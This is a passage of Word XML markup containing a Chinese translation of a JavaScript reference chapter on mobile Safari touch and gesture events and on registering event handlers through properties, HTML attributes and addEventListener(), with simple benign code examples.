        <w:t>iPhone</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>iPad</w:t>
      </w:r>
      <w:r>
        <w:t>设备上的</w:t>
      </w:r>
      <w:r>
        <w:t>Safari</w:t>
      </w:r>
      <w:r>
        <w:t>所产生的手势和触摸事件，还包括用户旋转这些设备时产生的</w:t>
      </w:r>
      <w:r>
        <w:t>orientationchange</w:t>
      </w:r>
      <w:r>
        <w:t>事件。在写本章时，这些事件尚未标准化，但</w:t>
      </w:r>
      <w:r>
        <w:t>W3C</w:t>
      </w:r>
      <w:r>
        <w:t>已经开始用</w:t>
      </w:r>
      <w:r>
        <w:t>Apple</w:t>
      </w:r>
      <w:r>
        <w:t>的触摸事件作为起点制定</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>触摸事件规范</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。本书第四部分并没有记录这些事件，但你可以在</w:t>
      </w:r>
      <w:r>
        <w:t>Apple</w:t>
      </w:r>
      <w:r>
        <w:t>的开发者中心（</w:t>
      </w:r>
      <w:r>
        <w:t>htt</w:t>
      </w:r>
      <w:r>
        <w:t>p://developer.apple.com/</w:t>
      </w:r>
      <w:r>
        <w:t>）查询更多信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Safari</w:t>
      </w:r>
      <w:r>
        <w:t>产生的手势事件用于两个手指的缩放和旋转手势。当手势开始时生成</w:t>
      </w:r>
      <w:r>
        <w:t>gesturestart</w:t>
      </w:r>
      <w:r>
        <w:t>事件，而手势结束时生成</w:t>
      </w:r>
      <w:r>
        <w:t>gestureend</w:t>
      </w:r>
      <w:r>
        <w:t>事件。在这两个事件之间是跟踪手势过程的</w:t>
      </w:r>
      <w:r>
        <w:t>gesturechange</w:t>
      </w:r>
      <w:r>
        <w:t>事件队列。这些事件传递的事件对象有数字属性</w:t>
      </w:r>
      <w:r>
        <w:t>scale</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>rotation</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>scale</w:t>
      </w:r>
      <w:r>
        <w:t>属性是两个手指之间当前距离和初始距离的比值。</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>捏紧</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>手势的</w:t>
      </w:r>
      <w:r>
        <w:t>scale</w:t>
      </w:r>
      <w:r>
        <w:t>值小于</w:t>
      </w:r>
      <w:r>
        <w:t>1.0</w:t>
      </w:r>
      <w:r>
        <w:t>，而</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>撑开</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>手势的</w:t>
      </w:r>
      <w:r>
        <w:t>scale</w:t>
      </w:r>
      <w:r>
        <w:t>值大于</w:t>
      </w:r>
      <w:r>
        <w:t>1.0</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>rotation</w:t>
      </w:r>
      <w:r>
        <w:t>属性是指从事件开始手指旋</w:t>
      </w:r>
      <w:r>
        <w:t>转的角度，它以度为单位，正值表示按照顺时针方向旋转。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>手势事件是高级事件，用于通知已经翻译的手势。如果想实现自定义手势，你可以监听低级触摸事件。当手指触摸屏幕时会触发</w:t>
      </w:r>
      <w:r>
        <w:t>touchstart</w:t>
      </w:r>
      <w:r>
        <w:t>事件，当手指移动时会触发</w:t>
      </w:r>
      <w:r>
        <w:t>touchmove</w:t>
      </w:r>
      <w:r>
        <w:t>事件，而当手指离开屏幕时会触发</w:t>
      </w:r>
      <w:r>
        <w:t>touchend</w:t>
      </w:r>
      <w:r>
        <w:t>事件。不像鼠标事件，触摸事件并不直接报告触摸的坐标。相反，触摸事件传递的事件对象有一个</w:t>
      </w:r>
      <w:r>
        <w:t>changedTouches</w:t>
      </w:r>
      <w:r>
        <w:t>属性，该属性是一个类数组对象，其每个元素都描述触摸的位置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当设备允许用户从竖屏旋转到横屏模式时会在</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象上触发</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>rientationchanged</w:t>
      </w:r>
      <w:r>
        <w:t>事件，该事件传递的事件对象本身没有用。但是，在移动版的</w:t>
      </w:r>
      <w:r>
        <w:t>Safari</w:t>
      </w:r>
      <w:r>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>orientation</w:t>
      </w:r>
      <w:r>
        <w:t>属性能给出当前方位，其值是</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>90</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>180</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>-90</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="429" w:name="17_2_Zhu_Ce_Shi_Jian_Chu_Li_Cheng_Xu_"/>
      <w:r>
        <w:t>17.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　注册事件处理程序</w:t>
      </w:r>
      <w:bookmarkEnd w:id="429"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注册事件处理程序有两种基本方式。第一种方式出现在</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>初期，给事件目标对象或文档元素设置属性。第二种方式更新并且更通用，是将事件处理程序传递给对象或元素的一个方法。但复杂的是，每种技术都有两个版本。可以在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码中设置事件处理程序为对象属性，或对于文档元素，可以在</w:t>
      </w:r>
      <w:r>
        <w:t>HTM</w:t>
      </w:r>
      <w:r>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:t>中直接设置相应属性。对于通过方法调用的处理程序注册，有一个标准方法，命名</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>，除</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>及以前版本之外，所有浏览器都支持这种方式，而</w:t>
      </w:r>
      <w:r>
        <w:t>IE 9</w:t>
      </w:r>
      <w:r>
        <w:t>之前的</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>版本支持的是一个叫</w:t>
      </w:r>
      <w:r>
        <w:t>attachEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>的不同方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="430" w:name="17_2_1_She_Zhi_JavaScriptDui_Xiang_Shu_X"/>
      <w:r>
        <w:t>17.2.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　设置</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象属性为事件处理程序</w:t>
      </w:r>
      <w:bookmarkEnd w:id="430"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注册事件处理程序最简单的方式就是通过设置事件目标的属性为所需事件处理程序函数。按照约定，事件处理程序属性的名字由</w:t>
      </w:r>
      <w:r>
        <w:t>"on"</w:t>
      </w:r>
      <w:r>
        <w:t>后面跟着事件名组成：</w:t>
      </w:r>
      <w:r>
        <w:t>onclick</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>onchange</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>onload</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>onmouseove</w:t>
      </w:r>
      <w:r>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>等。注意这些属性名是区分大小写的，所有都是小写，即使事件类型是由多个词组成（比如</w:t>
      </w:r>
      <w:r>
        <w:t>"readystatechange"</w:t>
      </w:r>
      <w:r>
        <w:t>）。下面是两个事件处理程序注册示例：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>设置</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>unload</w:t>
      </w:r>
      <w:r>
        <w:t>属性为一个函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>该函数是事件处理程序：当文档加载完毕时调用它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.onload=function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>查找一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var elt=document.getElementById("shipping_address");//</w:t>
      </w:r>
      <w:r>
        <w:t>注册事件处理程序函数，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在表单提交之前调用它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>elt.on</w:t>
      </w:r>
      <w:r>
        <w:t>submit=function(){return validate(this);}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这种事件处理程序注册技术适用于所有浏览器的所有常用事件类型。一般情况下，所有广泛实现的</w:t>
      </w:r>
      <w:r>
        <w:t>Web API</w:t>
      </w:r>
      <w:r>
        <w:t>定义的事件都允许通过设置事件处理程序属性来注册处理程序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>事件处理程序属性的缺点是其设计都是围绕着假设每个事件目标对于每种事件类型将最多只有一个处理程序。如果想编写能够在任意文档中都能使用的脚本库代码，更好的方式是使用一种不修改或覆盖任何已有注册处理程序的技术（比如</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="431" w:name="17_2_2_She_Zhi_HTMLBiao_Qian_Shu_Xing_We"/>
      <w:r>
        <w:t>17.2.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　设置</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>标签属性为事件处理程序</w:t>
      </w:r>
      <w:bookmarkEnd w:id="431"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>用于设置的文档元素事件处理程序属性（</w:t>
      </w:r>
      <w:r>
        <w:t>property</w:t>
      </w:r>
      <w:r>
        <w:t>）也能换成对应</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>标签的属性（</w:t>
      </w:r>
      <w:r>
        <w:t>attribute</w:t>
      </w:r>
      <w:r>
        <w:t>）。如果这样做，属性值应该是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码字符串。这段代码应该是事件处理程序函数的主体，而非完整的函数声明。也就是说，</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序代码不应该用大括号包围且使用</w:t>
      </w:r>
      <w:r>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:t>关键字作为前缀。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>button onclick="alert('Thank you');"</w:t>
      </w:r>
      <w:r>
        <w:t>＞点击这里＜</w:t>
      </w:r>
      <w:r>
        <w:t>/button</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序属性包含多</w:t>
      </w:r>
      <w:r>
        <w:t>条</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语句，要记住必须使用分号分隔这些语句或断开属性值使其跨多行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>某些事件类型通常直接在浏览器而非任何特定文档元素上触发。在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中，这些事件处理程序在</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象上注册。在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>中，会把它们放到＜</w:t>
      </w:r>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签上，但浏览器会在</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象上注</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>册它们。下面是</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>规范草案定义的这类事件处理程序的完整列表：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251698176" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="3157267" cy="659920"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="39" name="00039.jpeg" descr="000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00039.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3157267" cy="659920"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当指定一串</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码作为</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序属性的值时，浏览器会把代码串转换为类似如下的函数中：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function(event){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>wi</w:t>
      </w:r>
      <w:r>
        <w:t>th(document){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>with(this.form||{}){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>with(this){/*</w:t>
      </w:r>
      <w:r>
        <w:t>这里是编码</w:t>
      </w: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如果浏览器支持</w:t>
      </w:r>
      <w:r>
        <w:t>ES5</w:t>
      </w:r>
      <w:r>
        <w:t>，它将在非严格模式下定义这个函数（见</w:t>
      </w:r>
      <w:r>
        <w:t>5.7.3</w:t>
      </w:r>
      <w:r>
        <w:t>节）。当仔细研究</w:t>
      </w:r>
      <w:r>
        <w:t>17.3</w:t>
      </w:r>
      <w:r>
        <w:t>节的事件处理程序调用时，我们将看到关于</w:t>
      </w:r>
      <w:r>
        <w:t>event</w:t>
      </w:r>
      <w:r>
        <w:t>参数和</w:t>
      </w:r>
      <w:r>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:t>语句的更多内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>客户端编程的通用风格是保持</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>内容和</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>行为分离，遵循这条规则的程序员应禁止（或至少避免）使用</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序属性，因为这些属性直接混合了</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="432" w:name="17_2_3_addEventListener__"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>17.2.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="432"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在除</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>及之前版本外的所有浏览器都支持的标准事件模型中，任何能成为事件目标的对象</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>这些对象包括</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象、</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象和所有文档元素</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>都定义了一个名叫</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>的方法，使用这个方法可以为事件目标注册事件处理程序。</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>接受三个参数。第一个是要注册处理程序的事件类型，这个事件类型（或名字）是字符串，但它不应该包括用于设置事件处理程序属性的前缀</w:t>
      </w:r>
      <w:r>
        <w:t>"on"</w:t>
      </w:r>
      <w:r>
        <w:t>。第二个参数是当指定类型的事件发生</w:t>
      </w:r>
      <w:r>
        <w:t>时应该调用的函数。最后一个参数是布尔值。通常情况下，会给这个参数传递</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。如果相反传递了</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，那么函数将注册为捕获事件处理程序，并在事件不同的调度阶段调用。</w:t>
      </w:r>
      <w:r>
        <w:t>17.3.6</w:t>
      </w:r>
      <w:r>
        <w:t>节涵盖事件捕获。你应该可以忽略第三个参数并无须传递</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，同时规范最终应该会改变从而允许这么做，但在写本章时，忽略这个参数会在当前某些浏览器中出错。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>下面这段代码在＜</w:t>
      </w:r>
      <w:r>
        <w:t>button</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素上注册了</w:t>
      </w:r>
      <w:r>
        <w:t>click</w:t>
      </w:r>
      <w:r>
        <w:t>事件的两个处理程序。注意所用两个技术之间的不同：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>button id="my button"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">click </w:t>
      </w:r>
      <w:r>
        <w:t>me</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/button</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var b=document.getElementById("mybutton");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>b.onclick=function(){alert("Thanks for clicking me</w:t>
      </w:r>
      <w:r>
        <w:t>！</w:t>
      </w:r>
      <w:r>
        <w:t>");};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>b.addEventListener("click",function(){alert("Thanks again</w:t>
      </w:r>
      <w:r>
        <w:t>！</w:t>
      </w:r>
      <w:r>
        <w:t>");},false);</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用</w:t>
      </w:r>
      <w:r>
        <w:t>"click"</w:t>
      </w:r>
      <w:r>
        <w:t>作为第一个参数调用</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>不会影响</w:t>
      </w:r>
      <w:r>
        <w:t>onclick</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值。在前</w:t>
      </w:r>
      <w:r>
        <w:t>面的代码中，单击按钮会产生两个</w:t>
      </w:r>
      <w:r>
        <w:t>alert()</w:t>
      </w:r>
      <w:r>
        <w:t>对话框。更重要的是，能通过多次调用</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>为同一个对象注册同一事件类型的多个处理程序函数。当对象上发生事件时，所有该事件类型的注册处理程序都会按照注册的顺序调用。使用相同的参数在同一个对象上多次调用</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>是没用的，处理程序仍然只注册一次，同时重复调用也不会改变调用处理程序的顺序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
